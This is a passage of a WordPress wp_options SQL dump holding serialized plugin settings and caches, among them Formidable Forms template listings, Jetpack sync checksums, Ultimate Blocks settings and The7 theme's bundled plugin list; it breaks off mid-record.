(359892,'frm_applications_l','a:3:{s:7:\"timeout\";i:1692764232;s:5:\"value\";s:8377:\"{\"28192313\":{\"name\":\"Invoice PDF Template\",\"slug\":\"invoice-pdf\",\"description\":\"Create informative and detailed invoices in a short amount of time. All you have to do is input the needed information and the rest will be done for you.\",\"id\":28192313,\"released\":\"2023-04-18 16:06:51\",\"categories\":[\"Business\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/invoice-pdf\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/formidable\\/233\\/invoice-pdf-thumbnail.png\",1500,750,false],\"key\":\"invoice-pdf\",\"forms\":\"1\",\"views\":\"1\",\"download_id\":\"\",\"min_plan\":\"Business\",\"is_new\":false},\"28183762\":{\"name\":\"Certificate Template\",\"slug\":\"certificate-template\",\"description\":\"Create professional and personalized certificates in just a few clicks. Simply input your information, customize to your liking, and generate a high-quality PDF certificate ready for printing or digital sharing.\",\"id\":28183762,\"released\":\"2023-03-14 08:06:00\",\"categories\":[\"Business\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/certificate-template\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/2023\\/03\\/certificate-template-sm.png\",799,400,false],\"key\":\"certificate\",\"forms\":\"1\",\"views\":\"2\",\"download_id\":\"\",\"min_plan\":\"Business\",\"is_new\":false},\"28067848\":{\"name\":\"Business Hours Template\",\"slug\":\"business-hours-template\",\"description\":\"Set your business hours and show a message to let your visitors know if you are currently open or closed.\",\"id\":28067848,\"released\":\"2021-07-05 16:05:50\",\"categories\":[\"Business\",\"Personal+Views\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/business-hours-template\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/edd\\/2018\\/06\\/show-business-hours-e1625522740990.png\",584,292,false],\"key\":\"business-hours\",\"forms\":\"1\",\"views\":\"2\",\"download_id\":\"28123666\",\"min_plan\":\"Business\",\"is_new\":false},\"28191512\":{\"name\":\"Letter of Recommendation Template\",\"slug\":\"letter-of-recommendation-template\",\"description\":\"Find your dream job with a professional letter of recommendation. Often written by the job applicant\'s most recent supervisor, this letter highlights the applicant\'s abilities, traits, and qualities relevant to the job position for which they are applying.\",\"id\":28191512,\"released\":\"2023-04-14 23:14:05\",\"categories\":[\"Business\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/letter-of-recommendation-template\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/formidable\\/233\\/letter-of-recommendation-template.jpg\",750,375,false],\"key\":\"letter-of-recommendation\",\"forms\":\"1\",\"views\":\"2\",\"download_id\":\"\",\"min_plan\":\"Business\",\"is_new\":false},\"28067388\":{\"name\":\"Team Directory Template\",\"slug\":\"team-directory-template\",\"description\":\"Choose between two layouts, add your team in the form, and done.\",\"id\":28067388,\"released\":\"2021-07-01 19:44:54\",\"categories\":[\"Directories\",\"Elite\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/team-directory-template\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/2021\\/07\\/team-directory-list-e1625523195128.png\",700,350,false],\"key\":\"team-directory\",\"forms\":\"1\",\"views\":\"2\",\"download_id\":\"28123668\",\"min_plan\":\"Elite\",\"is_new\":false},\"28076695\":{\"name\":\"FAQ Template\",\"slug\":\"faq-template-wordpress\",\"description\":\"Save time by easily adding new questions and answers to your FAQ page.\",\"id\":28076695,\"released\":\"2021-09-02 16:03:02\",\"categories\":[\"Business\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/faq-template-wordpress\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/formidable\\/233\\/faqs.png\",750,375,false],\"key\":\"faq-template-wordpress\",\"forms\":\"1\",\"views\":\"2\",\"download_id\":\"28123662\",\"min_plan\":\"Business\",\"is_new\":false},\"28144026\":{\"name\":\"Member Directory Template\",\"slug\":\"member-directory-template\",\"description\":\"Register users, let them edit their own profiles, and add them to a searchable member list.\",\"id\":28144026,\"released\":\"2022-08-24 15:16:08\",\"categories\":[\"Directories\",\"Elite\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/member-directory-template\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/formidable\\/233\\/member-directory-grid.png\",1500,750,false],\"key\":\"member-directory\",\"forms\":\"1\",\"views\":\"2\",\"download_id\":\"28144027\",\"min_plan\":\"Elite\",\"is_new\":false},\"28080544\":{\"name\":\"Product Review and Purchase Template\",\"slug\":\"product-review-template\",\"description\":\"Boost customer satisfaction by gathering product feedback. Also allow product purchases.\",\"id\":28080544,\"released\":\"2021-09-20 14:03:33\",\"categories\":[\"Elite\",\"Stripe\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/product-review-template\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/formidable\\/233\\/product-listing-with-reviews.png\",900,450,false],\"key\":\"product-review\",\"forms\":\"3\",\"views\":\"2\",\"download_id\":\"28124372\",\"min_plan\":\"Elite\",\"is_new\":false},\"28124324\":{\"name\":\"Real Estate Listing Template\",\"slug\":\"real-estate-listings-template\",\"description\":\"View real estate listings, search, and add new listings. Logged-in users can edit their listings too.\",\"id\":28124324,\"released\":\"2022-05-05 13:55:32\",\"categories\":[\"Business+Views\",\"Elite\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/real-estate-listings-template\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/formidable\\/233\\/real-estate-listings-template.png\",1500,750,false],\"key\":\"real-estate-listings\",\"forms\":\"1\",\"views\":\"1\",\"download_id\":\"28124331\",\"min_plan\":\"Elite\",\"is_new\":false},\"28165573\":{\"name\":\"Testimonials Template\",\"slug\":\"testimonials-template\",\"description\":\"Collect testimonials in the form, and choose between three layouts before publishing.\",\"id\":28165573,\"released\":\"2022-12-23 17:37:16\",\"categories\":[\"Business\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/testimonials-template\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/2022\\/12\\/testimonial-cards.png\",1500,750,false],\"key\":\"testimonials\",\"forms\":\"1\",\"views\":\"3\",\"download_id\":\"\",\"min_plan\":\"Business\",\"is_new\":false},\"28068553\":{\"name\":\"Restaurant Menu Template\",\"slug\":\"restaurant-menu-template\",\"description\":\"Instantly create an online restaurant menu in WordPress.\",\"id\":28068553,\"released\":\"2021-07-30 15:06:08\",\"categories\":[\"Business\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/restaurant-menu-template\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/formidable\\/233\\/Restaurant-menu-main-course.png\",750,375,false],\"key\":\"restaurant-menu\",\"forms\":\"2\",\"views\":\"2\",\"download_id\":\"28123664\",\"min_plan\":\"Business\",\"is_new\":false},\"28127949\":{\"name\":\"Link in Bio Instagram Page\",\"slug\":\"link-in-bio-instagram\",\"description\":\"Create a landing page for the \\\"Link in Bio\\\" from Instagram.\",\"id\":28127949,\"released\":\"2022-05-25 14:14:27\",\"categories\":[\"Business\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/link-in-bio-instagram\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/formidable\\/233\\/link-in-bio-instagram-grid-1.png\",1500,750,false],\"key\":\"link-in-bio-instagram\",\"forms\":\"1\",\"views\":\"1\",\"download_id\":\"28127946\",\"min_plan\":\"Business\",\"is_new\":false},\"28193743\":{\"name\":\"Contract Agreement Template\",\"slug\":\"contract-agreement-template\",\"description\":\"Easily create a contract to fit your needs by using this contract agreement template.\",\"id\":28193743,\"released\":\"2023-04-25 17:14:57\",\"categories\":[\"Business\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/contract-agreement-template\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/formidable\\/233\\/Contract-agreement-template-thumbnail.png\",1500,750,false],\"key\":\"contract-agreement\",\"forms\":\"1\",\"views\":\"1\",\"download_id\":\"\",\"min_plan\":\"Business\",\"is_new\":false},\"28144093\":{\"name\":\"Business Directory Template\",\"slug\":\"business-directory-template\",\"description\":\"Collect paid business listings, accept user reviews, and let visitors contact a business.\",\"id\":28144093,\"released\":\"2022-08-24 17:06:32\",\"categories\":[\"Directories\",\"Elite\",\"Stripe\"],\"link\":\"https:\\/\\/formidableforms.com\\/view-templates\\/business-directory-template\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/formidable\\/233\\/all-business-listings.png\",825,413,false],\"key\":\"business-directory\",\"forms\":\"3\",\"views\":\"2\",\"download_id\":\"28144089\",\"min_plan\":\"Elite\",\"is_new\":false}}\";s:7:\"version\";s:5:\"6.4.1\";}','no'),
(360299,'cfdb7_view_install_date','2023-08-22 23:15:51','yes'),
(360685,'give_cache_8d93c59e36ed41ca5ec3dd80f1f1ebaa','a:2:{s:4:\"data\";N;s:10:\"expiration\";i:1692782933;}','no'),
(360686,'give_cache_5402ccb7e589d7f6ebc287b8fdd3a330','a:2:{s:4:\"data\";N;s:10:\"expiration\";i:1692782933;}','no'),
(361802,'mk_fm_close_fm_help_c_fm','done','yes'),
(361989,'jetpack_constants_sync_checksum','a:21:{s:7:\"ABSPATH\";i:968288065;s:17:\"ALTERNATE_WP_CRON\";i:634125391;s:16:\"ATOMIC_CLIENT_ID\";i:634125391;s:26:\"AUTOMATIC_UPDATER_DISABLED\";i:634125391;s:15:\"DISABLE_WP_CRON\";i:634125391;s:18:\"DISALLOW_FILE_EDIT\";i:634125391;s:18:\"DISALLOW_FILE_MODS\";i:634125391;s:16:\"EMPTY_TRASH_DAYS\";i:2473281379;s:9:\"FS_METHOD\";i:634125391;s:12:\"IS_PRESSABLE\";i:634125391;s:16:\"JETPACK__VERSION\";i:1633451387;s:11:\"PHP_VERSION\";i:1704765466;s:19:\"WP_ACCESSIBLE_HOSTS\";i:634125391;s:19:\"WP_AUTO_UPDATE_CORE\";i:634125391;s:14:\"WP_CONTENT_DIR\";i:2691557661;s:20:\"WP_CRON_LOCK_TIMEOUT\";i:3994858278;s:8:\"WP_DEBUG\";i:734881840;s:22:\"WP_HTTP_BLOCK_EXTERNAL\";i:634125391;s:19:\"WP_MAX_MEMORY_LIMIT\";i:1474498405;s:15:\"WP_MEMORY_LIMIT\";i:3065409971;s:17:\"WP_POST_REVISIONS\";i:4261170317;}','yes'),
(361990,'jetpack_sync_https_history_home_url','a:1:{i:0;s:5:\"https\";}','yes'),
(361991,'jetpack_sync_https_history_main_network_site_url','a:1:{i:0;s:5:\"https\";}','yes'),
(361992,'jetpack_sync_https_history_site_url','a:1:{i:0;s:5:\"https\";}','yes'),
(361995,'jetpack_callables_sync_checksum','a:39:{s:21:\"get_loaded_extensions\";i:596564071;s:11:\"get_plugins\";i:545122211;s:10:\"get_themes\";i:691572835;s:24:\"get_plugins_action_links\";i:909235009;s:28:\"has_file_system_write_access\";i:4261170317;s:8:\"home_url\";i:2705283181;s:16:\"hosting_provider\";i:769900095;s:12:\"is_fse_theme\";i:734881840;s:15:\"is_main_network\";i:734881840;s:13:\"is_multi_site\";i:734881840;s:21:\"is_version_controlled\";i:734881840;s:6:\"locale\";i:110763218;s:17:\"main_network_site\";i:2705283181;s:26:\"main_network_site_wpcom_id\";i:207343609;s:14:\"paused_plugins\";i:223132457;s:13:\"paused_themes\";i:223132457;s:18:\"post_type_features\";i:673248474;s:10:\"post_types\";i:3372904629;s:27:\"rest_api_allowed_post_types\";i:2544842423;s:32:\"rest_api_allowed_public_metadata\";i:3610467939;s:5:\"roles\";i:2986826501;s:10:\"shortcodes\";i:2687231320;s:13:\"site_icon_url\";i:734881840;s:8:\"site_url\";i:2705283181;s:10:\"taxonomies\";i:944254661;s:13:\"theme_support\";i:2320410942;s:8:\"timezone\";i:3808505409;s:23:\"wp_get_environment_type\";i:1138987844;s:18:\"wp_max_upload_size\";i:677931734;s:10:\"wp_version\";i:3149620026;s:14:\"active_modules\";i:1952761214;s:16:\"single_user_site\";i:734881840;s:7:\"updates\";i:2903718415;s:24:\"available_jetpack_blocks\";i:223132457;s:24:\"sso_is_two_step_required\";i:734881840;s:26:\"sso_should_hide_login_form\";i:734881840;s:18:\"sso_match_by_email\";i:734881840;s:21:\"sso_new_user_override\";i:734881840;s:29:\"sso_bypass_default_login_form\";i:734881840;}','no'),
(365216,'ultimate_blocks','a:23:{i:0;a:3:{s:5:\"label\";s:16:\"Advanced Heading\";s:4:\"name\";s:19:\"ub/advanced-heading\";s:6:\"active\";b:1;}i:1;a:3:{s:5:\"label\";s:14:\"Advanced Video\";s:4:\"name\";s:17:\"ub/advanced-video\";s:6:\"active\";b:1;}i:2;a:3:{s:5:\"label\";s:17:\"Button (Improved)\";s:4:\"name\";s:9:\"ub/button\";s:6:\"active\";b:1;}i:3;a:3:{s:5:\"label\";s:14:\"Call To Action\";s:4:\"name\";s:23:\"ub/call-to-action-block\";s:6:\"active\";b:1;}i:4;a:3:{s:5:\"label\";s:14:\"Click To Tweet\";s:4:\"name\";s:17:\"ub/click-to-tweet\";s:6:\"active\";b:1;}i:5;a:3:{s:5:\"label\";s:14:\"Content Filter\";s:4:\"name\";s:23:\"ub/content-filter-block\";s:6:\"active\";b:1;}i:6;a:3:{s:5:\"label\";s:14:\"Content Toggle\";s:4:\"name\";s:23:\"ub/content-toggle-block\";s:6:\"active\";b:1;}i:7;a:3:{s:5:\"label\";s:9:\"Countdown\";s:4:\"name\";s:12:\"ub/countdown\";s:6:\"active\";b:1;}i:8;a:3:{s:5:\"label\";s:7:\"Divider\";s:4:\"name\";s:10:\"ub/divider\";s:6:\"active\";b:1;}i:9;a:3:{s:5:\"label\";s:6:\"Expand\";s:4:\"name\";s:9:\"ub/expand\";s:6:\"active\";b:1;}i:10;a:3:{s:5:\"label\";s:6:\"How To\";s:4:\"name\";s:9:\"ub/how-to\";s:6:\"active\";b:1;}i:11;a:3:{s:5:\"label\";s:12:\"Image Slider\";s:4:\"name\";s:15:\"ub/image-slider\";s:6:\"active\";b:1;}i:12;a:3:{s:5:\"label\";s:9:\"Post Grid\";s:4:\"name\";s:12:\"ub/post-grid\";s:6:\"active\";b:1;}i:13;a:3:{s:5:\"label\";s:12:\"Progress Bar\";s:4:\"name\";s:15:\"ub/progress-bar\";s:6:\"active\";b:1;}i:14;a:3:{s:5:\"label\";s:6:\"Review\";s:4:\"name\";s:9:\"ub/review\";s:6:\"active\";b:1;}i:15;a:3:{s:5:\"label\";s:12:\"Social Share\";s:4:\"name\";s:15:\"ub/social-share\";s:6:\"active\";b:1;}i:16;a:3:{s:5:\"label\";s:11:\"Star Rating\";s:4:\"name\";s:20:\"ub/star-rating-block\";s:6:\"active\";b:1;}i:17;a:3:{s:5:\"label\";s:10:\"Styled Box\";s:4:\"name\";s:13:\"ub/styled-box\";s:6:\"active\";b:1;}i:18;a:3:{s:5:\"label\";s:11:\"Styled List\";s:4:\"name\";s:14:\"ub/styled-list\";s:6:\"active\";b:1;}i:19;a:3:{s:5:\"label\";s:14:\"Tabbed Content\";s:4:\"name\";s:23:\"ub/tabbed-content-block\";s:6:\"active\";b:1;}i:20;a:3:{s:5:\"label\";s:17:\"Table of Contents\";s:4:\"name\";s:26:\"ub/table-of-contents-block\";s:6:\"active\";b:1;}i:21;a:3:{s:5:\"label\";s:11:\"Testimonial\";s:4:\"name\";s:14:\"ub/testimonial\";s:6:\"active\";b:1;}i:22;a:3:{s:5:\"label\";s:4:\"Icon\";s:4:\"name\";s:7:\"ub/icon\";s:6:\"active\";b:1;}}','yes'),
(365217,'ultimate_blocks_css_version','3.0.2','yes'),
(365218,'UltimateBlocks_installDate','2023-08-25 06:21:28','yes'),
(365219,'UltimateBlocks_review_notify','no','yes'),
(365222,'_site_transient_timeout_fs_locked_1','2008304505','no'),
(365223,'_site_transient_fs_locked_1','1','no'),
(365336,'action_scheduler_migration_status','complete','yes'),
(365586,'the7_registered','yes','no'),
(365587,'the7_plugins_list','a:16:{i:0;a:8:{s:4:\"name\";s:13:\"The7 Elements\";s:4:\"slug\";s:12:\"dt-the7-core\";s:8:\"required\";b:0;s:7:\"version\";s:5:\"2.7.6\";s:6:\"tested\";s:3:\"6.3\";s:16:\"force_activation\";b:0;s:18:\"force_deactivation\";b:0;s:6:\"source\";s:83:\"https://repo.the7.io/plugins/download.php?code=the7_purchase_code&item=dt-the7-core\";}i:1;a:8:{s:4:\"name\";s:8:\"The7 CLI\";s:4:\"slug\";s:8:\"the7-cli\";s:8:\"required\";b:0;s:7:\"version\";s:5:\"1.0.0\";s:6:\"tested\";s:3:\"6.3\";s:16:\"force_activation\";b:0;s:18:\"force_deactivation\";b:0;s:6:\"source\";s:79:\"https://repo.the7.io/plugins/download.php?code=the7_purchase_code&item=the7-cli\";}i:2;a:7:{s:4:\"name\";s:21:\"WPBakery Page Builder\";s:4:\"slug\";s:11:\"js_composer\";s:8:\"required\";b:0;s:7:\"version\";s:3:\"7.1\";s:16:\"force_activation\";b:0;s:18:\"force_deactivation\";b:0;s:6:\"source\";s:82:\"https://repo.the7.io/plugins/download.php?code=the7_purchase_code&item=js_composer\";}i:3;a:7:{s:4:\"name\";s:17:\"Slider Revolution\";s:4:\"slug\";s:9:\"revslider\";s:8:\"required\";b:0;s:7:\"version\";s:6:\"6.6.17\";s:16:\"force_activation\";b:0;s:18:\"force_deactivation\";b:0;s:6:\"source\";s:80:\"https://repo.the7.io/plugins/download.php?code=the7_purchase_code&item=revslider\";}i:4;a:7:{s:4:\"name\";s:48:\"Go Pricing - WordPress Responsive Pricing Tables\";s:4:\"slug\";s:10:\"go_pricing\";s:8:\"required\";b:0;s:7:\"version\";s:3:\"3.4\";s:16:\"force_activation\";b:0;s:18:\"force_deactivation\";b:0;s:6:\"source\";s:81:\"https://repo.the7.io/plugins/download.php?code=the7_purchase_code&item=go_pricing\";}i:5;a:9:{s:4:\"name\";s:35:\"Ultimate Addons for Visual Composer\";s:4:\"slug\";s:18:\"Ultimate_VC_Addons\";s:8:\"required\";b:0;s:7:\"version\";s:7:\"3.19.19\";s:4:\"icon\";s:70:\"http://support.brainstormforce.com/wp-content/uploads/2017/07/uavc.jpg\";s:5:\"icons\";a:1:{s:2:\"1x\";s:70:\"http://support.brainstormforce.com/wp-content/uploads/2017/07/uavc.jpg\";}s:16:\"force_activation\";b:0;s:18:\"force_deactivation\";b:0;s:6:\"source\";s:89:\"https://repo.the7.io/plugins/download.php?code=the7_purchase_code&item=Ultimate_VC_Addons\";}i:6;a:7:{s:4:\"name\";s:11:\"ConvertPlus\";s:4:\"slug\";s:11:\"convertplug\";s:8:\"required\";b:0;s:7:\"version\";s:6:\"3.5.24\";s:16:\"force_activation\";b:0;s:18:\"force_deactivation\";b:0;s:6:\"source\";s:82:\"https://repo.the7.io/plugins/download.php?code=the7_purchase_code&item=convertplug\";}i:7;a:7:{s:4:\"name\";s:20:\"Fast Velocity Minify\";s:4:\"slug\";s:20:\"fast-velocity-minify\";s:8:\"required\";b:0;s:7:\"version\";s:5:\"3.4.1\";s:16:\"force_activation\";b:0;s:18:\"force_deactivation\";b:0;s:6:\"source\";s:91:\"https://repo.the7.io/plugins/download.php?code=the7_purchase_code&item=fast-velocity-minify\";}i:8;a:3:{s:4:\"name\";s:14:\"Contact Form 7\";s:4:\"slug\";s:14:\"contact-form-7\";s:8:\"required\";b:0;}i:9;a:3:{s:4:\"name\";s:49:\"Give – Donation Plugin and Fundraising Platform\";s:4:\"slug\";s:4:\"give\";s:8:\"required\";b:0;}i:10;a:3:{s:4:\"name\";s:18:\"Hotel Booking Lite\";s:4:\"slug\";s:28:\"motopress-hotel-booking-lite\";s:8:\"required\";b:0;}i:11;a:3:{s:4:\"name\";s:15:\"Stripe Payments\";s:4:\"slug\";s:15:\"stripe-payments\";s:8:\"required\";b:0;}i:12;a:3:{s:4:\"name\";s:9:\"Elementor\";s:4:\"slug\";s:9:\"elementor\";s:8:\"required\";b:0;}i:13;a:3:{s:4:\"name\";s:11:\"WooCommerce\";s:4:\"slug\";s:11:\"woocommerce\";s:8:\"required\";b:0;}i:14;a:3:{s:4:\"name\";s:23:\"TI WooCommerce Wishlist\";s:4:\"slug\";s:23:\"ti-woocommerce-wishlist\";s:8:\"required\";b:0;}i:15;a:5:{s:4:\"name\";s:12:\"PRO Elements\";s:14:\"protected_slug\";s:12:\"pro-elements\";s:8:\"required\";b:0;s:7:\"aliases\";a:1:{i:0;s:13:\"elementor-pro\";}s:6:\"source\";s:84:\"https://github.com/proelements/proelements/releases/latest/download/pro-elements.zip\";}}','no'),
(365597,'brainstrom_bundled_products','a:1:{i:14058953;a:41:{i:0;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:15:\"connects-mymail\";s:4:\"init\";s:35:\"connects-mymail/connects-mymail.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:19:\"connects-mymail.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:26:\"Connects - Mailster Mailer\";s:10:\"short_name\";s:8:\"Mailster\";s:7:\"version\";s:5:\"2.2.4\";s:6:\"tested\";s:5:\"5.5.3\";s:4:\"slug\";s:15:\"connects-mymail\";s:13:\"product_image\";s:67:\"//support.brainstormforce.com/wp-content/uploads/2016/03/MyMail.png\";s:11:\"description\";s:42:\"Integration with Mailster Email Solutions.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.2.4\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:80:\"https://changelog.brainstormforce.com/convertplug-addons/mailster-version-2-2-3/\";}i:1;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:16:\"connects-madmimi\";s:4:\"init\";s:37:\"connects-madmimi/connects-madmimi.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:20:\"connects-madmimi.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:26:\"Connects - Mad Mimi Mailer\";s:10:\"short_name\";s:8:\"Mad Mimi\";s:7:\"version\";s:5:\"1.1.2\";s:6:\"tested\";s:5:\"5.5.1\";s:4:\"slug\";s:16:\"connects-madmimi\";s:13:\"product_image\";s:68:\"//support.brainstormforce.com/wp-content/uploads/2016/03/MadMini.png\";s:11:\"description\";s:51:\"Integration with Mad Mimi Email Marketing Services.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.1.2\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:2;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:23:\"connects-activecampaign\";s:4:\"init\";s:51:\"connects-activecampaign/connects-activecampaign.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:27:\"connects-activecampaign.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:32:\"Connects - ActiveCampaign Mailer\";s:10:\"short_name\";s:14:\"ActiveCampaign\";s:7:\"version\";s:5:\"3.0.6\";s:6:\"tested\";s:3:\"5.5\";s:4:\"slug\";s:23:\"connects-activecampaign\";s:13:\"product_image\";s:76:\"//support.brainstormforce.com/wp-content/uploads/2016/03/Active-Campaign.png\";s:11:\"description\";s:81:\"Integrate ActiveCampaign with Connects for Email marketing, Marketing Automation.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"3.0.6\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:87:\"https://changelog.brainstormforce.com/convertplug-addons/active-campaign-version-3-0-5/\";}i:3;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:13:\"connects-emma\";s:4:\"init\";s:33:\"connects-myemma/connects-emma.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:19:\"connects-myemma.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:25:\"Connects - My Emma Mailer\";s:10:\"short_name\";s:7:\"My Emma\";s:7:\"version\";s:5:\"1.0.2\";s:6:\"tested\";s:5:\"4.6.1\";s:4:\"slug\";s:15:\"connects-myemma\";s:13:\"product_image\";s:67:\"//support.brainstormforce.com/wp-content/uploads/2016/03/MyEmma.png\";s:11:\"description\";s:48:\"Integrate with My Emma Email Marketing Services.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.2\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:4;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:18:\"connects-mailchimp\";s:4:\"init\";s:41:\"connects-mailchimp/connects-mailchimp.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:22:\"connects-mailchimp.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:27:\"Connects - MailChimp Mailer\";s:10:\"short_name\";s:9:\"MailChimp\";s:7:\"version\";s:5:\"2.2.4\";s:6:\"tested\";s:5:\"5.4.2\";s:4:\"slug\";s:18:\"connects-mailchimp\";s:13:\"product_image\";s:70:\"//support.brainstormforce.com/wp-content/uploads/2016/03/Mailchimp.png\";s:11:\"description\";s:52:\"Integration with MailChimp Email Marketing Services.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.2.4\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:81:\"https://changelog.brainstormforce.com/convertplug-addons/mailchimp-version-2-2-2/\";}i:5;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:16:\"connects-hubspot\";s:4:\"init\";s:37:\"connects-hubspot/connects-hubspot.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:20:\"connects-hubspot.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:25:\"Connects - HubSpot Mailer\";s:10:\"short_name\";s:7:\"HubSpot\";s:7:\"version\";s:5:\"1.1.3\";s:6:\"tested\";s:5:\"4.9.7\";s:4:\"slug\";s:16:\"connects-hubspot\";s:13:\"product_image\";s:68:\"//support.brainstormforce.com/wp-content/uploads/2016/03/hubspot.png\";s:11:\"description\";s:62:\"Integration with HubSpot Inbound Marketing and Sales Software.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.1.3\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:6;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:17:\"connects-icontact\";s:4:\"init\";s:39:\"connects-icontact/connects-icontact.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:21:\"connects-icontact.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:26:\"Connects - iContact Mailer\";s:10:\"short_name\";s:8:\"iContact\";s:7:\"version\";s:5:\"1.1.1\";s:6:\"tested\";s:5:\"4.7.3\";s:4:\"slug\";s:17:\"connects-icontact\";s:13:\"product_image\";s:69:\"//support.brainstormforce.com/wp-content/uploads/2016/03/iContact.png\";s:11:\"description\";s:51:\"Integration with iContact Email Marketing Services.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.1.1\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:7;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:15:\"connects-aweber\";s:4:\"init\";s:35:\"connects-aweber/connects-aweber.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:19:\"connects-aweber.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:24:\"Connects - Aweber 